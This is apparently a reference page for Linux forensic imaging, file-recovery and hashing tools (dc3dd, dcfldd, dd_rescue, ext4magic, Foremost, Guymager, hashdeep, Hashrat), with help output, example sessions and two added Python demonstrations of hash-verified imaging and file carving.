hlog=FILE Log total hashes and piecewise hashes to FILE.
This option can be used more than once to generate
multiple logs.
mlog=FILE Create hash log that is easier for machine to read
-----------------
advanced options:
-----------------
fhod=DEVICE The same as hof=DEVICE, with additional
hashing of the entire output DEVICE. This option
can be used more than once (see note #3 below
for how to generate multiple outputs).
rec=off By default, zeros are written to the output(s) in
place of bad sectors when the input is a device.
Use this option to cause the program to instead
exit when a bad sector is encountered.
wipe=DEVICE Wipe DEVICE by writing zeros (default) or a
pattern specified by pat= or tpat=.
hwipe=DEVICE Wipe DEVICE by writing zeros (default) or a
pattern specified by pat= or tpat=. Verify
DEVICE after writing it by hashing it and
comparing the hash(es) to the input hash(es).
pat=HEX Use pattern as input, writing HEX to every byte
of the output. This option can only be used once
and cannot be combined with if=, ifs=, or
tpat=.
tpat=TEXT Use text pattern as input, writing the string TEXT
repeatedly to the output. This option can only be
used once and cannot be combined with if=, ifs=,
or pat=.
cnt=SECTORS Read only SECTORS input sectors. Must be used
with pat= or tpat= if not using the pattern with
wipe= or hwipe= to wipe a device.
iskip=SECTORS Skip SECTORS sectors at start of the input device
or file.
oskip=SECTORS Skip SECTORS sectors at start of the output
file. Specifying oskip= automatically
sets app=on.
app=on Do not overwrite an output file specified with
of= if it already exists, appending output instead.
ssz=BYTES Unconditionally use BYTES (see note #5 below) bytes
for sector size. If ssz= is not specified,
sector size is determined by probing the device;
if the probe fails or the target is not a device,
a sector size of 512 bytes is assumed.
bufsz=BYTES Set the size of the internal byte buffers to BYTES
(see note #5 below). This effectively sets the
maximum number of bytes that may be read at a time
from the input. BYTES must be a multiple of sector
size. Use this option to fine-tune performance.
verb=on Activate verbose reporting, where sectors in/out
are reported for each file in sets of files
specified using ifs=, ofs=, or hofs=.
Alternatively, verbose reporting may be activated
at compile time using -DDEFAULT_VERBOSE_REPORTING.
nwspc=on Activate compact reporting, where the use
of white space to divide log output into
logical sections is suppressed. Alternatively,
compact reporting may be activated at compile
time using -DDEFAULT_COMPACT_REPORTING.
b10=on Activate base 10 bytes reporting, where the
progress display reports 1000 bytes instead
of 1024 bytes as 1 KB. Alternatively, base 10
bytes reporting may be activated at compile
time using -DDEFAULT_BASE_TEN_BYTES_REPORTING.
corruptoutput=on For verification testing and demonstration
purposes, corrupt the output file(s) with extra
bytes so a hash mismatch is guaranteed.
-------------
help options:
-------------
--help display this help and exit
--version output version information and exit
--flags display compile-time flags and exit
■ Example
# Create a backup of the device with dd
root@kali:~# dd if=/dev/loop0 of=/root/backup.img bs=64K conv=noerror,sync
1600+0 records in
1600+0 records out
104857600 bytes (105 MB, 100 MiB) copied, 0.485763 s, 216 MB/s
# Create a backup of the device with dc3dd
root@kali:~# dc3dd if=/dev/loop0 hof=/root/backup.img hash=sha256
device size: 204800 sectors (probed), 104,857,600 bytes
sector size: 512 bytes (probed)
104857600 bytes ( 100 M ) copied ( 100% ), 1 s, 99 M/s
104857600 bytes ( 100 M ) hashed ( 100% ), 0 s, 246 M/s
input results for device `/dev/loop0':
204800 sectors in
0 bad sectors replaced by zeros
1d0396cefc83db42fbffa24baf34ec24ad763569bbc9d017a0b69e814aae69a8 (sha256)
output results for file `/root/backup.img':
204800 sectors out
[ok] 1d0396cefc83db42fbffa24baf34ec24ad763569bbc9d017a0b69e814aae69a8 (sha256)
dc3dd completed at 2024-12-06 10:27:14 +0000
dcfldd
An extended version of GNU dd that adds on-the-fly hash computation, status output, split output to multiple files and other features.
■ Usage
root@kali:~# dcfldd --help
Usage: dcfldd [OPTION]...
bs=BYTES force ibs=BYTES and obs=BYTES (default=32768)
cbs=BYTES convert BYTES bytes at a time
conv=KEYWORDS convert the file as per the comma separated keyword list
count=BLOCKS copy only BLOCKS input blocks
limit=BYTES similar to count but using BYTES instead of BLOCKS
ibs=BYTES read BYTES bytes at a time
if=FILE read from FILE instead of stdin
obs=BYTES write BYTES bytes at a time
of=FILE write to FILE instead of stdout
of:=COMMAND exec and write output to process COMMAND
seek=BLOCKS skip BLOCKS obs-sized blocks at start of output
skip=BLOCKS skip BLOCKS ibs-sized blocks at start of input
pattern=HEX use the specified binary pattern as input
textpattern=TEXT use repeating TEXT as input
errlog=FILE send error messages to FILE as well as stderr
hash=NAME do hash calculation (md5, sha1, sha256, sha384 or sha512)
hashlog=FILE send hash output to FILE instead of stderr
hashwindow=BYTES perform a hash on every BYTES amount of data
hashlog:=COMMAND exec and write hashlog to process COMMAND
ALGORITHMlog:=COMMAND also works in the same fashion of hashlog:=COMMAND
hashconv=[before|after] perform the hashing before or after the conversions
hashformat=FORMAT display each hashwindow according to FORMAT
totalhashformat=FORMAT display the total hash value according to FORMAT
status=[on|off] display a continual status message on stderr
statusinterval=N update the status message every N blocks
sizeprobe=[if|of|BYTES] what to use as value to percentage indicator
split=BYTES write every BYTES amount of data to a new file
splitformat=[TEXT|MAC|WIN] the file extension format for split operation
vf=FILE verify that FILE matches the specified input
verifylog=FILE send verify results to FILE instead of stderr
verifylog:=COMMAND exec and write verify results to process COMMAND
--help display this help and exit
--version output version information and exit
■ Example
# Create a backup of the device with dd
root@kali:~# dd if=/dev/loop0 of=/root/backup.img bs=64K conv=noerror,sync
1600+0 records in
1600+0 records out
104857600 bytes (105 MB, 100 MiB) copied, 0.485763 s, 216 MB/s
# Create a backup of the device with dcfldd
root@kali:~# dcfldd if=/dev/loop0 of=/root/backup.img hash=sha256
3072 blocks (96Mb) written.
Total (sha256): 1d0396cefc83db42fbffa24baf34ec24ad763569bbc9d017a0b69e814aae69a8
3200+0 records in
3200+0 records out
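Both dc3dd (hash=, hof=) and dcfldd (hash=, hashwindow=) above add integrity checking that plain dd lacks. The following is an added example, not code from either tool, that shows what those options do: hash the input while streaming it to the image, record piecewise window hashes, then re-read the image and compare (dc3dd's hof= check), including the mismatch case a corrupted image produces. It works on file-like objects, so the constructed in-memory "device" below stands in for /dev/loop0.

```python
"""Forensic imaging with on-the-fly hashing and output verification."""
import hashlib
import io
from typing import BinaryIO, List, Optional

# Constructed stand-in for a block device: 100 KiB of a repeating byte pattern.
SAMPLE_DEVICE = bytes(range(256)) * 400


def image_and_hash(src: BinaryIO, dst: BinaryIO, algo: str = "sha256",
                   bufsz: int = 65536, hashwindow: Optional[int] = None) -> dict:
    """Copy src to dst while hashing the input bytes as they stream past.

    With hashwindow set, also record a hash for every `hashwindow` bytes of
    input (dcfldd hashwindow=), so a later mismatch can be localised to one
    window instead of invalidating the whole image.
    """
    total = hashlib.new(algo)
    windows: List[str] = []
    win = hashlib.new(algo)
    win_fill = 0
    copied = 0
    while True:
        chunk = src.read(bufsz)
        if not chunk:
            break
        total.update(chunk)
        dst.write(chunk)
        copied += len(chunk)
        if hashwindow:
            view = memoryview(chunk)
            while len(view):
                take = min(hashwindow - win_fill, len(view))
                win.update(view[:take])
                win_fill += take
                view = view[take:]
                if win_fill == hashwindow:
                    windows.append(win.hexdigest())
                    win, win_fill = hashlib.new(algo), 0
    if hashwindow and win_fill:
        windows.append(win.hexdigest())  # trailing partial window
    dst.flush()
    return {"algo": algo, "bytes": copied,
            "input_hash": total.hexdigest(), "windows": windows}


def hash_stream(stream: BinaryIO, algo: str, bufsz: int = 65536) -> str:
    h = hashlib.new(algo)
    for chunk in iter(lambda: stream.read(bufsz), b""):
        h.update(chunk)
    return h.hexdigest()


def verify_image(result: dict, dst: BinaryIO) -> dict:
    """Re-read the written image and compare its hash with the input hash,
    the check dc3dd performs for hof=/hofs= outputs."""
    dst.seek(0)
    out_hash = hash_stream(dst, result["algo"])
    return {**result, "output_hash": out_hash,
            "verified": out_hash == result["input_hash"]}


def demo() -> dict:
    """Image the constructed device and verify it, then corrupt one byte of
    the image (as dc3dd corruptoutput=on does for testing) and verify again."""
    src, dst = io.BytesIO(SAMPLE_DEVICE), io.BytesIO()
    clean = verify_image(image_and_hash(src, dst, hashwindow=32768), dst)
    dst.seek(10)
    dst.write(b"\xff")  # SAMPLE_DEVICE[10] is 0x0a, so this really changes the image
    corrupted = verify_image(clean, dst)
    return {"clean": clean, "corrupted": corrupted,
            "reference": hashlib.sha256(SAMPLE_DEVICE).hexdigest()}


if __name__ == "__main__":
    results = demo()
    for label in ("clean", "corrupted"):
        res = results[label]
        mark = "[ok]" if res["verified"] else "[MISMATCH]"
        print(f"{label}: {res['bytes']} bytes, {len(res['windows'])} hash windows")
        print(f"  input  {res['input_hash']} ({res['algo']})")
        print(f"  output {res['output_hash']} {mark}")
```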
dd_rescue
Copies data from a failing drive while doing as little additional damage to it as possible.
■ Usage
root@kali:~# dd_rescue --help
USAGE: dd_rescue [options] infile outfile
Options: -s ipos start position in input file (default=0),
-S opos start position in output file (def=ipos),
-b softbs block size for copy operation (def=131072, 1048576 for -d),
-B hardbs fallback block size in case of errs (def=4096, 512 for -d),
-e maxerr exit after maxerr errors (def=0=infinite),
-m maxxfer maximum amount of data to be transferred (def=0=inf),
-M avoid extending outfile,
-x count opos from the end of outfile (eXtend),
-y syncsz frequency of fsync calls in bytes (def=512*softbs),
-l logfile name of a file to log errors and summary to (def=""),
-o bbfile name of a file to log bad blocks numbers (def=""),
-r reverse direction copy (def=forward),
-R repeatedly write same block (def if infile is /dev/zero),
-t truncate output file at start (def=no),
-T truncate output file at last pos (def=no),
-u undo writes by deleting outfile and issuing fstrim
-d/D use O_DIRECT for input/output (def=no),
-k use efficient in-kernel zerocopy splice,
-P use fallocate to preallocate target space,
-L plug1[=par1[:par2]][,plug2[,..]] load plugins,
-w abort on Write errors (def=no),
-W read target block and avoid Writes if identical (def=no),
-a detect zero-filled blocks and write spArsely (def=no),
-A Always write blocks, zeroed if err (def=no),
-i interactive: ask before overwriting data (def=no),
-f force: skip some sanity checks (def=no),
-p preserve: preserve ownership, perms, times, attrs (def=no),
-C limit rateControl: avoid xfer data faster than limit B/s
-Y oname Secondary output file (multiple possible),
-F off[-off]r/rep[,off[-off]w/rep[,...]] fault injection (hardbs off) r/w
-q quiet operation,
-v verbose operation,
-c 0/1 switch off/on colors (def=auto),
-V display version and exit,
-h display this help and exit.
Instead of infile, -z/Z SEED or -z/Z SEEDFILE may be specified, taking the PRNG
from libc or frandom (RC4 based) as input. SEED = 0 means a time based seed;
Using /dev/urandom as SEEDFILE gives good pseudo random numbers.
Likewise, -3 SEED/SEEDFILE will overwrite ofile 3 times (r,ir,0, BSI M7.15).
With -4 SEED/SEEDFILE you get an additional random pass (r,ir,r2,0).
With -2 SEED/SEEDFILE you only get one random pass (r,0).
Sizes may be given in units b(=512), k(=1024), M(=1024^2) or G(1024^3) bytes
This program is useful to rescue data in case of I/O errors, because
it does not normally abort or truncate the output.
It may also help data protection by securely overwriting data.
There are plugins for compression, hashing and encryption.
Have a look a the man page for more details and long options.
■ Example
# Create a block device with injected error sectors
root@kali:~# dmsetup create baddevice << EOF
0 2000 linear /dev/loop0 0
2000 96 error
2096 202704 linear /dev/loop0 2096
EOF
# Copy the faulty device to an image
root@kali:~# dd_rescue /dev/mapper/baddevice backup.img
dd_rescue: (info): Using softbs=128.0kiB, hardbs=4.0kiB
dd_rescue: (info): expect to copy 102400.0kiB from /dev/mapper/baddevice
dd_rescue: (info): ipos: 1000.0k, opos: 1000.0k, xferd: 1000.0k
* errs: 0, errxfer: 0.0k, succxfer: 1000.0k
+curr.rate: 22847kB/s, avg.rate: 23739kB/s, avg.load: 19.0%
>-........................................< 0% ETA: 0:00:04
dd_rescue: (warning): read /dev/mapper/baddevice (1000.0kiB): Input/output error!
dd_rescue: (warning): Bad block reading /dev/mapper/baddevice: 250
dd_rescue: (info): ipos: 1004.0k, opos: 1004.0k, xferd: 1004.0k
* errs: 1, errxfer: 4.0k, succxfer: 1000.0k
+curr.rate: 17965kB/s, avg.rate: 23171kB/s, avg.load: 18.8%
>x........................................< 0% ETA: 0:00:04
[...]
dd_rescue: (info): ipos: 102400.0k, opos: 102400.0k, xferd: 102400.0k
errs: 12, errxfer: 48.0k, succxfer: 102352.0k
+curr.rate: 6477kB/s, avg.rate: 8669kB/s, avg.load: 34.1%
>x----------------------------------------< 100% TOT: 0:00:12
dd_rescue: (warning): There were 25 errors!
Ext4magic
A disk utility that recovers files from ext3 or ext4 partitions.
■ Usage
root@kali:~# man ext4magic
SYNOPSIS
ext4magic {-M|-m} [-j <journal_file>] [-d <target_dir>] <filesystem>
ext4magic [-S|-J|-H|-V|-T] [-x] [-j <journal_file>] [-B n|-I n|-f <file_name>|-i <input_list>] [-t n|[[-a n][-b n]]] [-d <target_dir>]
[-R|-r|-L|-l] [-Q] <filesystem>
OPTIONS
-M Try to recover all files. This option should be used if the entire Filesystem was deleted.
-m Try to recover only all deleted files. Use this option with a partially deleted Filesystem.
-S Print the filesystem superblock, the option. -x allows the additional display of content of the group descriptor table.
-J Print the content of the Journal superblock. This option also can used to force loading the Journal. This has a flow control ef‐
fect in ext4magic with some other options.
-H Output a histogram of time stamps from all filesystem Inodes. Allows you to determine the exact time of changes in the filesys‐
tem. In connection with a directory name or a directory Inode, only the time stamps of this directory tree will be displayed.
There are not evaluated any changes, only one per Inode. either the last change or the deletion time per Inode arrives to dis‐
play. If present (ext4), it also create a histogram of create time stamps.
-V Print the version of ext4magic and libext2fs
-T Display the entire transaction list of all copies of data blocks in the Journal. In conjunction with the -B ; -I and -f , only
display the corresponding data blocks for this data . The optional option -x allows an additional transmission time of the trans‐
actions, but only if the block is a Inode block. The print is in the same order as the data in journal. You can make conclusions
from the data received in the Journal. After the import of backups or after change of timestamps of files, the additional trans‐
mission time will display not always the real transmission time. If here absolutely incorrect time entries, then check if you
using a journal of a read-write open file system.
-x controls optional the output format and the information content of certain commands. Affects the following options: -S ; -H ; -T
; -B ; -I ; -f ; -L ; -l Detailed description see there.
-B n n is the data block number of a filesystem datablock. Without further options it print a "one-byte" hex+ASCII dump from the data
block on the filesystem, like the "hexdump -C" command. The optional option -x produced a "four byte" hex+ASCII output.
-I n n is the Inode number. Without any other option, the output is the content of the real filesystem Inode. With a optional -x addi‐
tional output of a list of all data blocks addressed by this Inode. If Inode is a directory Inode, the content of the directory
entries also printed.
-f <filename>
the function is the same as -I n only here is the <filename> given instead the Inode number. ext4magic search the filesystem to
find the Inode number. The filename can be a directory or a filename and must be specified here from the root directory of this
filesystem, and not from the root directory of the LINUX system.
-s blocksize -n blocknumber
with this options you can select the backup superblock. blocksize can be 1024, 2048 or 4096. blocknumber is the block number of
the backup superblock this depends on the block size. Use the same values as with "fsck" or "debugfs" or use the output of "mkfs
-n .." to determine the correct value.
-c This will attempt to find the journal using the data of the superblock. Can help if the first inode blocks of the file system
are damaged.
-D trying a restore of all files from a badly damaged file system. The combination of all these Expert Options try a file system re‐
store if the superblock broken and the beginning of the file system is corrupted or overwritten. This can only work if e2fsck
has not yet changed the faulty file system.
-Q This is a optional high quality Option for recover and only impact with " -r " and " -R ". Without this option, any valid file
name restored from the directories and you can set the " before " time stamp to a time in which all files are deleted. So you
will find the maximum possible number of files. It need not necessarily be found old directory data blocks in the Journal. How‐
ever, there are some files found too much. In this mode, re-used file name and reused Inode can not be noticed. As a result some
file will be created with the extension " "#" or some files created with wrong content. You have to check the files and find bad
files and delete itself.
-a n with this option you can set the " after " time
-b n with this option you can set the " before " time
-t n is an indirect time option. you can use it with the options -B ; -I ; -f The value n is the transaction number. With this option
you can print, list, or recover the data from this transaction number. you can find the transaction numbers with the option -T
or in the print of the Inode content.
-j <journal_file>
optional you can select a external copy of the Journal file. Without this option, automatically the internal Journal or, if con‐
figured, the external Journal on a block device will used.
-d <target_dir>
select the output directory. There, the recovered files were written. If it does not exist, it is created. By default, created
files are written to the subdirectory " RECOVERDIR " in the workpath of the actual shell. This output directory can not be on the
same filesystem to be tested filesystem, and should have sufficient space to write the recovered files. The filesystem on this
directory should be also ext3/4, otherwise, not LINUX like filesystems generate some errors while writing the file properties.
Either you must first changed with the shell in such a suitable filesystem, or you must specify the -d with a target to such a
directory
-i <input_list>
input_list is a input file. Must contain a list with double-quoted filenames. The files from the list will be restored with op‐
tion -r or -R
-L Prints the list of all filenames and Inode number of the selected directory tree. Included here also are deleted files and
deleted directory trees. With the additional option. -x the file names are printed double-quoted. You can use it for a "Input
list" with option -i
-l Prints a list of all filenames which have not allocated data blocks. At the beginning of the line are the percentage of unallo‐
cated data blocks. After deletion you find here all the file names you can recover with the Journal data. If you use a very old
value for the "before" time, it is possible there are files whose data blocks reused and these files in the interim also been
deleted. Also included in the list all files without data blocks, symbolic links, empty and other special files.
-r applied to directories, all files without conflicts with the occupied blocks will recovered. This are all you can sea with the
option -l and be 100% unallocated. This options only recover deleted files and files without data blocks, in example: symbolic
links or empty files.
-R recovers directory tree, is the same as -r
■ Example
# Delete an arbitrary file
root@kali:~# rm /mnt/example/database/database.sqlite
# Run file recovery with ext4magic
root@kali:~# ext4magic /dev/loop0 -m -d recovered
Warning: Activate magic-scan or disaster-recovery function, may be some command line options ignored
"recovered" accept for recoverdir
Filesystem in use: /dev/loop0
Using internal Journal at Inode 8
Activ Time after : Sun Dec 8 02:24:48 2024
Activ Time before : Sun Dec 8 02:39:47 2024
Inode 2 is allocated
-------- recovered/example/public/favicon.ico
-------- recovered/example/resources/css/app.css
MAGIC-1 : start lost directory search
MAGIC-2 : start lost file search
-------- recovered/MAGIC-2/application/vnd.sqlite3\012-/I_0000000148.unknown
MAGIC-2 : start lost in journal search
-------- recovered/MAGIC-2/text/plain/I_0000025766.txt
MAGIC-3 : start ext4-magic-scan search
-------- recovered/MAGIC-3/text/plain/0000008708.txt
-------- recovered/MAGIC-3/text/plain/0000008709.txt
-------- recovered/MAGIC-3/text/plain/0000008710.txt
ext4magic : EXIT_SUCCESS
# The hashes of the deleted file and the recovered file match
root@kali:~# sha256sum database.sqlite
eedcb75a8b2b69c690525ab05f103f173ff665b7ba5355a3b0314c4721817836 database.sqlite
root@kali:~# sha256sum I_0000000148.unknown
eedcb75a8b2b69c690525ab05f103f173ff665b7ba5355a3b0314c4721817836 I_0000000148.unknown
# Comparing the files byte by byte from the start also finds no difference
root@kali:~# cmp -b database.sqlite I_0000000148.unknown
Foremost
Recovers files from fragmented raw data that has no metadata by analysing headers, footers and internal data structures (file carving).
■ Usage
root@kali:~# foremost -h
$ foremost [-v|-V|-h|-T|-Q|-q|-a|-w-d] [-t <type>] [-s <blocks>] [-k <size>]
[-b <size>] [-c <file>] [-o <dir>] [-i <file]
-V - display copyright information and exit
-t - specify file type. (-t jpeg,pdf ...)
-d - turn on indirect block detection (for UNIX file-systems)
-i - specify input file (default is stdin)
-a - Write all headers, perform no error detection (corrupted files)
-w - Only write the audit file, do not write any detected files to the disk
-o - set output directory (defaults to output)
-c - set configuration file to use (defaults to foremost.conf)
-q - enables quick mode. Search are performed on 512 byte boundaries.
-Q - enables quiet mode. Suppress output messages.
-v - verbose mode. Logs all messages to screen
■ Example
root@kali:~# foremost -v -i /dev/sda1 -o ./recover
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File
Foremost started at Sat Oct 5 03:02:58 2024
Invocation: foremost -i /dev/sda1 -o ./recover -v
Output directory: ./recover
Configuration file: /etc/foremost.conf
Processing: /dev/sda1
|------------------------------------------------------------------
File: /dev/sda1
Start: Sat Oct 5 03:02:58 2024
Length: 80 GB (85998951424 bytes)
Num Name (bs=512) Size File Offset Comment
*0: 00363360.gif 1 KB 186040796 (0 x 18759)
1: 00290931.htm 72 KB 148956770
2: 00291076.htm 142 B 149031056
3: 00291076_1.htm 293 B 149031200
4: 00291078.htm 162 B 149031976
5: 00291078_1.htm 204 B 149032144
[...]
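As an added example that is not Foremost's own code, the header/footer carving idea described above in Python: it scans a constructed raw image with no filesystem metadata for JPEG, PNG and GIF signatures, cuts out each file, and verifies the carved PNG by its chunk CRCs. The signature table, the sample files and the `block_size=512` quick-mode switch (modelled on foremost -q) are all constructed here and are assumptions, not Foremost's configuration.

```python
import os
import struct
import zlib

# Signature table, constructed here from well-known magic numbers (Foremost keeps
# its own rules in /etc/foremost.conf): type, header, footer, maximum carve size.
SIGNATURES = [
    ("jpg", b"\xff\xd8\xff", b"\xff\xd9", 20 * 1024 * 1024),
    ("png", b"\x89PNG\r\n\x1a\n", b"IEND\xae\x42\x60\x82", 20 * 1024 * 1024),
    ("gif", b"GIF8", b"\x00\x3b", 5 * 1024 * 1024),
]


def carve(data, block_size=1):
    """Scan raw bytes for header/footer pairs; return a list of (type, offset, bytes).

    block_size=512 behaves like foremost -q: only headers that begin on a 512-byte
    boundary are considered, which is faster but misses files stored unaligned
    (e.g. embedded in another file or in slack space).
    """
    found = []
    for name, header, footer, max_size in SIGNATURES:
        pos = 0
        while (start := data.find(header, pos)) != -1:
            if block_size > 1 and start % block_size:
                pos = start + 1        # unaligned header: ignored in quick mode
                continue
            end = data.find(footer, start + len(header), start + max_size)
            if end == -1:
                pos = start + 1        # no footer within max_size: not carvable
                continue
            end += len(footer)
            found.append((name, start, bytes(data[start:end])))
            pos = end                  # resume after the carved file
    found.sort(key=lambda item: item[1])
    return found


def png_chunks_valid(blob):
    """Verify every chunk CRC of a carved PNG; a cut made too early or too late fails."""
    if not blob.startswith(b"\x89PNG\r\n\x1a\n"):
        return False
    pos = 8
    while pos + 12 <= len(blob):
        (length,) = struct.unpack(">I", blob[pos:pos + 4])
        if pos + 12 + length > len(blob):
            return False               # truncated chunk
        tag = blob[pos + 4:pos + 8]
        body = blob[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(tag + body) != crc:
            return False
        pos += 12 + length
        if tag == b"IEND":
            return pos == len(blob)    # nothing may follow the IEND chunk
    return False


def make_png(width, height, rgb):
    """Build a small valid 8-bit RGB PNG (only used to construct the sample image)."""
    def chunk(tag, body):
        return (struct.pack(">I", len(body)) + tag + body
                + struct.pack(">I", zlib.crc32(tag + body)))
    rows = b"".join(b"\x00" + bytes(rgb) * width for _ in range(height))
    return (b"\x89PNG\r\n\x1a\n"
            + chunk(b"IHDR", struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0))
            + chunk(b"IDAT", zlib.compress(rows))
            + chunk(b"IEND", b""))


# Constructed minimal files: a JFIF stub (SOI + APP0 + EOI) and a 1x1 GIF89a.
SAMPLE_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               + b"\xff\xd9")
SAMPLE_GIF = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0) + b"\x3b"


def build_sample_image():
    """Constructed raw image with no filesystem metadata: three files inside zero
    filler. The JPEG and PNG start on 512-byte boundaries; the GIF deliberately
    does not, so quick mode will miss it."""
    img = bytearray(512)                                  # block 0: empty
    img += SAMPLE_JPEG                                    # offset 512
    img += bytes(1024 - len(img))
    img += make_png(2, 2, (0x10, 0x20, 0x30))             # offset 1024
    img += bytes(2048 + 17 - len(img))
    img += SAMPLE_GIF                                     # offset 2065, unaligned
    img += bytes(3072 - len(img))
    return bytes(img)


if __name__ == "__main__":
    image = build_sample_image()
    os.makedirs("carved", exist_ok=True)
    for name, offset, blob in carve(image):
        path = os.path.join("carved", f"{offset:08d}.{name}")
        with open(path, "wb") as fh:
            fh.write(blob)
        print(f"{path}: {len(blob)} bytes")
    print("quick mode (-q style) found", len(carve(image, 512)), "of 3 files")
```

Footer-based carving is only as good as the footer: a JPEG with an embedded thumbnail contains an inner EOI marker, which is why a CRC or parser check on the carved output (as done for the PNG here) belongs in any recovery workflow.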
Guymager
Creates disk images quickly using a fast multi-threaded engine with parallel compression. It is operated through a GUI.
■ Usage
root@kali:~# man guymager
SYNOPSIS
guymager [log=log_file] [cfg=configuration_file] [options]
OPTIONS
log=log_file
By default, guymager uses /var/log/guymager.log as its log file. This option allows for specifying a different file.
cfg=configuration_file
The default configuration file is /etc/guymager/guymager.cfg. This option allows for specifying a different file. Guymager creates a template configuration file when the option -cfg=template.cfg is given.
All other configuration options may be specified on the command line and/or in the configuration file. See /etc/guymager/guymager.cfg
for a description of all possible options. In case an option is specified in the configuration file and on the command line, the command
line dominates.
EXIT CODES
Guymager normally returns an exit code of 0. Exit code 1 means that Guymager terminated because the AutoExit function became active. All
other exit codes are related to internal Guymager or Qt errors.
■ Example
root@kali:~# guymager
Select a device and create a raw (dd) image
hashdeep
Computes hash values of files. Supports the md5, sha1, sha256, tiger and whirlpool hash algorithms.
■ Usage
root@kali:~# hashdeep -h
$ hashdeep [OPTION]... [FILES]...
-c <alg1,[alg2]> - Compute hashes only. Defaults are MD5 and SHA-256
legal values: md5,sha1,sha256,tiger,whirlpool,
-p <size> - piecewise mode. Files are broken into blocks for hashing
-r - recursive mode. All subdirectories are traversed
-d - output in DFXML (Digital Forensics XML)
-k <file> - add a file of known hashes
-a - audit mode. Validates FILES against known hashes. Requires -k
-m - matching mode. Requires -k
-x - negative matching mode. Requires -k
-w - in -m mode, displays which known file was matched
-M and -X act like -m and -x, but display hashes of matching files
-e - compute estimated time remaining for each file
-s - silent mode. Suppress all error messages
-b - prints only the bare name of files; all path information is omitted
-l - print relative paths for filenames
-i/-I - only process files smaller than the given threshold
-o - only process certain types of files. See README/manpage
-v - verbose mode. Use again to be more verbose
-d - output in DFXML; -W FILE - write to FILE.
-j <num> - use num threads (default 8)
■ Example
root@kali:~# hashdeep -c sha256 -r .
%%%% HASHDEEP-1.0
%%%% size,sha256,filename
## Invoked from: /usr/local/src/ec-cube/src
## # hashdeep -c sha256 -r .
##
31,f60574ee8ab3b617af2622b1c24e1f59bda780b84318ccdcb5cf004cc07d3e98,/usr/local/src/ec-cube/src/.htaccess
778,5ff384fa88ddd0c779b874938b15c5e6f5cea5ccee8650f9258d4aabef3c97fe,/usr/local/src/ec-cube/src/Eccube/Util/ReflectionUtil.php
2333,c42264839ae46895bee5cf852a9bc2cd4822a82381e48222ff1e48cb578e82b5,/usr/local/src/ec-cube/src/Eccube/Request/Context.php
6389,3265735c5015c98ea9ee6a048666539d9b627f04649fb154aede7161423f04b1,/usr/local/src/ec-cube/src/Eccube/Util/CacheUtil.php
1452,011e1a9f77192c30f614a7640ea20b9c5876da93c03ec5e2b88b3a1453e630dd,/usr/local/src/ec-cube/src/Eccube/Util/FormUtil.php
1309,b33efe65bc3bf415c35813b14c6f2adbaa8c7bea8bc59287dfd27861ea506c66,/usr/local/src/ec-cube/src/Eccube/Util/EntityUtil.php
767,afb734ca306cef2faca2a6d1ebd0f1d61ea43eed04a034e7b17461c76d4d84ad,/usr/local/src/ec-cube/src/Eccube/Util/FilesystemUtil.php
[...]
Hashrat
Computes hash values of standard input or files. Supports the md5, sha1, sha256, sha512, whirlpool, jh-224, jh-256, jh-384 and jh-512 hash algorithms and their HMAC versions.
■ Usage
root@kali:~# hashrat --help
Usage:
hashrat [options] [path to hash]...
hashrat -c [options] [input file of hashes]...
Options:
--help Print this help
-help Print this help
-? Print this help
--version Print program version
-version Print program version
-md5 Use md5 hash algorithm
-sha1 Use sha1 hash algorithm
-sha256 Use sha256 hash algorithm
-sha512 Use sha512 hash algorithm
-whirl Use whirlpool hash algorithm
-whirlpool Use whirlpool hash algorithm
-jh224 Use jh-224 hash algorithm
-jh256 Use jh-256 hash algorithm
-jh384 Use jh-384 hash algorithm
-jh512 Use jh-512 hash algorithm
-hmac HMAC using specified hash algorithm
-totp <secret> TOTP code with secret, defaults to google-authenticator compatible setup
-totp <url> TOTP code from supplied otpauth url (option can distinguish between secret and url)
-digits <n> produce otp codes with <n> digits
-period <n> produce otp codes with period/lifetime of <n> seconds
-8 Encode with octal instead of hex
-10 Encode with decimal instead of hex
-H Encode with UPPERCASE hexadecimal
-HEX Encode with UPPERCASE hexadecimal
-32 Encode with base32 instead of hex
-base32 Encode with base32 instead of hex
-c32 Encode with Crockford base32 instead of hex
-w32 Encode with word-safe base32 instead of hex
-z32 Encode with zbase32 instead of hex
-64 Encode with base64 instead of hex
-base64 Encode with base64 instead of hex
-i64 Encode with base64 with rearranged characters
-p64 Encode with base64 with a-z,A-Z and _-, for best compatibility with 'allowed characters' in websites.
-r64 Encode with base64 with a-z,A-Z and _-, rfc4648 compatible.
-rfc4648 Encode with base64 with a-z,A-Z and _-, rfc4648 compatible.
-x64 Encode with XXencode style base64.
-u64 Encode with UUencode style base64.
-g64 Encode with GEDCOM style base64.
-a85 Encode with ASCII85.
-z85 Encode with ZEROMQ variant of ASCII85.
-t Output hashes in traditional md5sum, shaXsum format
-trad Output hashes in traditional md5sum, shaXsum format
-bsd Output hashes in bsdsum format
-tag Output hashes in bsdsum format
--tag Output hashes in bsdsum format
-r Recurse into directories when hashing files
-hid Show hidden (starting with .) files
-hidden Show hidden (starting with .) files
-f <listfile> Hash files listed in <listfile>
-i <patterns> Only hash items matching a comma-seperated list of shell patterns
-x <patterns> Exclude items matching a comma-sepearted list of shell patterns
-X <file> Exclude items matching shell patters stored in <file>
-name <patterns> Only hash items matching a comma-seperated list of shell patterns (-name aka 'find')
-mtime <days> Only hash items <days> old. Has the same format as the find command, e.g. -10 is younger than ten days, +10 is older than ten, and 10 is ten days old
-mmin <mins> Only hash items <min> minutes old. Has the same format as the find command, e.g. -10 is younger than ten mins, +10 is older than ten, and 10 is ten mins old
-myear <years> Only hash items <years> old. Has the same format as the find command, e.g. -10 is younger than ten years, +10 is older than ten, and 10 is ten years old
-exec In CHECK or MATCH mode only examine executable files.
-dups Search for duplicate files.
-n <length> Truncate hashes to <length> bytes
-segment <length> Break hash up into segments of <length> chars seperated by '-'
-c CHECK hashes against list from file (or stdin)
-cf CHECK hashes against list but only show failures
-C <dir> Recursively CHECK directory against list of files on stdin
-Cf <dir> Recursively CHECK directory against list but only show failures
-m MATCH files from a list read from stdin.
-lm Read hashes from stdin, upload them to a memcached server (requires the -memcached option).
